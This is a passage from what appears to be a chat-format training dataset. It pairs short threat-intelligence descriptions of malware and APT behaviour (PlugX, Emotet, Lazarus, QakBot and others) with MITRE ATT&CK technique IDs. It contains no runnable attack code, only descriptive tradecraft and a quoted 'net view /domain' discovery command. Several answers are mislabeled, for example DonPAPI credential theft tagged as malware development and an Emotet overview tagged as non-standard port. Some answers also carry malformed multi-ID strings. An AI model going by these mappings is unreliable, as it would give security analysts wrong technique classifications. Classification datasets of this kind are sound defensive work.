technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: Dell SecureWorks) Further research revealed additional tools containing the same username (see Figure 21)" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "2. The perpetrators distributed PlugX messages to employees- personal addresses, claiming to come from fellow members of staff. The letters contained photos of alleged senders. Along with the photos, all the information about personal mailboxes could have been collected during the group-s initial presence on corporate workstations." }, { "role": "assistant", "content": "T1114 - Email Collection', 'T1598 - Phishing for Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system." }, { "role": "assistant", "content": "T1608.002 - Upload Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used HTTPS for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is a RAT that communicates with HTTP." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Siloscape connects to an IRC server for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Five minutes after the automated reconnaissance activities are completed, the QAKBOT-injected wermgr.exe process drops the Brute Ratel DLL and invokes it via a rundll32.exe child process with the “main” export function." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name" }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malware used by the threat group can be configured to bypass network-based detection; however, the threat actors rarely modify host-based configuration settings when deploying payloads. The threat actors demonstrated the ability to adapt when reentering a network after an eviction, overcoming technical barriers constructed by network defenders" }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For this method, Ransom Cartel uses a tool named \"\"DonPAPI,\"\" which can search hosts for DPAPI blobs containing Wi-Fi keys, RDP passwords, and credentials saved in web browsers and then download and decrypt them locally on the machine." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Doki has communicated with C2 over HTTPS." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanoCore uses DES to encrypt the C2 traffic." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuTo Stealer can use `cmd.exe` to execute a created batch file." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has used VBS scripts." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Throughout the year, Volexity identified multiple Vietnamese-language news websites that appeared to be compromised, as they were being used to load an OceanLotus web profiling framework. The exact functionality varied from site to site, but the goal of these frameworks was to gather information about site visitors and, in some cases, deliver malware. This code appears to be a variation of what Volexity has previously described as Framework A" }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The PcShare payload has been injected into the `logagent.exe` and `rdpclip.exe` processes." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a large list of C2 servers that it cycles through until a successful connection is established." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM has relied upon users clicking on a malicious link delivered through phishing." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to gather the IP address from the victim's machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Regin has used a hidden file system to store some of its components." }, { "role": "assistant", "content": "T1564.005 - Hidden File System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "29],[30(link is external)] - During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. 32(link is external)] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": ". The attackers have also used file names and export API names in the CRAT DLLs to masquerade the RAT as a benign application's library. Some examples of the exported function names are:. " }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sykipot may use \"net view /domain\" to display hostnames of available systems on a network." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Matryoshka is capable of keylogging." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITSAdmin can be used to create BITS Jobs to upload and/or download files from SMB file servers." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to access the ADMIN$, C$\\Windows, D$\\Windows, and E$\\Windows shares on the victim with its current privileges." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TAINTEDSCRIBE can download additional modules from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used Web shells, often to maintain access to a victim network." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In at least two incident response (IR) engagements, Blue Mockingbird has exploited public-facing web applications (T1190: Exploit Public-Facing Application) that implemented Telerik UI for ASP.NET AJAX. This suite of user interface components accelerates the web development process, but some versions are susceptible to a deserialization vulnerability, CVE-2019-18935. The exploitation of this CVE is not unique to Blue Mockingbird, but it has been a common point of entry" }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Final1stspy uses HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX has a module for capturing keystrokes per process including window titles." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When communicating with its C2 server, Psylo will use HTTPS with a unique user-agent of (notice the lack of a space between \"5.0\" and \"(Windows" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "With the above done, the malware logs off all users and executes a small program — a “locker” — in a new thread. The path to the locker file named mssetup.exe is retrieved from the configuration. Finally, before moving to its main cause — wiping the system — the malware creates a scheduled task that assures its own persistence in the system. The scheduled task will be executed every time the system starts" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A few minutes after the initial execution, BazarLoader ran some discovery tasks using the built in Microsoft net and nltest utilities and transferred the results over the C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LaZagne can perform credential dumping from memory to obtain account and password information." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity can parse the hard drive on a compromised host to identify specific file extensions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If yes, it generates an RSA PKCS key using CryptGenKey that is used for encryption of communication session keys. It then writes the RSA key to the PRVK key in the [Version] section of the config file. Turla’s Carbon backdoor also implements RSA encryption on the session keys for some of its C&C channels" }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has used a customized PlugX variant which could spread through USB connections." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the exploit succeeds, this Fallout Exploit Kit downloads a “.tmp” file to the %Temp% directory and calls CreateProcess to execute it. Further analysis revealed that the “.tmp” file was the latest variant of Azorult malware. It was the first time we’ve seen the new variant of Azorult malware used as primary payload for Fallout Exploit Kit" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs" }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging', 'T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is a simple proxy that creates an outbound RDP connection." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gold Dragon uses cmd.exe to execute commands for discovery." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used multi-stage malware components that inject later stages into separate processes." }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS can use DDE to execute additional payloads on compromised hosts." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has registered look-alike domains for use in phishing campaigns." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has renamed the \"psexec\" service name to \"mstdc\" to masquerade as a legitimate Windows service." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs decrypts and extracts a copy of its main DLL payload when executing." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal has the ability to steal documents from the local system including the print spooler queue." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The QakBot dropper can delay dropping the payload to evade detection." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It moves the property list (plist) file com.dorusio.pkg.wallet.plist from the Installer package to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches Dorusio_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004" }, { "role": "assistant", "content": "T1543.004 - Create or Modify System Process: Launch Daemon" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PipeMon's first stage has been executed by a call to \"CreateProcess\" with the decryption password in an argument. PipeMon has used a call to \"LoadLibrary\" to load its installer." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 11: XML configuration file to schedule the task The Zyklon malware first retrieves the external IP address of the infected machine using the following: api.ipify[.]org ip.anysrc[.]net myexternalip[.]com whatsmyip[.]com The Zyklon executable contains another encrypted file in its .Net resource section named tor" }, { "role": "assistant", "content": "T1036 - Masquerading', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 obfuscates strings and payloads." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has deployed scripts on compromised systems that automatically scan for interesting documents." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MCMD can upload additional files to a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a batch file that configures the ComSysApp service to autostart in order to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used ping to identify other machines of interest." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The LNK file is finally used to identify a third file: a ZIP file" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilBunny has deleted the initial dropper after running through the environment checks." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Curiously, the same private session key is also encrypted with another public key hardcoded into the body of the Trojan, regardless of the configuration. It turns out that someone who knows the private key corresponding to the public skeleton key is able to decrypt the victim’s files, even without the private key for sub_key. It seems like the Trojan developers built a loophole into the algorithm allowing them to decrypt files behind the distributors’ back" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SPACESHIP copies staged data to removable drives when they are inserted into the system." }, { "role": "assistant", "content": "T1052.001 - Exfiltration over USB" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proxysvc lists processes running on the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa can collect then exfiltrate files from the compromised system." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet is one of the most widely distributed and actively developed malware families on the crimeware landscape today. Emotet began purely as a banking trojan, but over the years, has continued to evolve and more recently, has been associated with some larger-scale targeted Ryuk ransomware infections. Emotet is commonly delivered via both macro-laden office documents, as well as URL-based spam messages that lead to an eventual infection. It's not uncommon to see Emotet reuse of some of the command and control (C2) servers over more extended periods. The goal of Emotet, as is the case with crimeware-based threats, is monetary. Attackers use Emotet to deliver modular payloads it can use to monetize infections" }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leveraging Existing Windows Services to Deliver Malware Windows Management Instrumentation Console (WMIC) provides a command line interface to WMI" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When loaded with startup command 2, the installer can copy the original explorer.exe file inside its current running directory and rename d3d9.dll to uxtheme.dll. In this case the persistence is achieved by loading the original explorer.exe from its startup location and, using DLL side-loading, passing the execution control to the stage 4 malware (discussed in next section" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has utilized multiple commands to identify data of interest in file and directory listings." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat actor in this case hosted the MSI file on GitHub using a spoofed file extension to look like a PDF" }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates a backdoor through which remote attackers can delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One variant of creates a new service using either a hard-coded or randomly generated name." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload is stored in a hidden directory at /Users/Shared/.local/kextd." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon obtains the target's IP address and local network segment." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A tool can read and decrypt stored Registry values." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WarzoneRAT can disarm Windows Defender during the UAC process to evade detection." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can use TCP in C2 communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire has the ability to gather browser data such as bookmarks and visited sites." }, { "role": "assistant", "content": "T1217 - Browser Bookmark Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can download and execute a replica of itself using certutil." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used the service control manager on a remote system to disable services associated with security monitoring products." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": 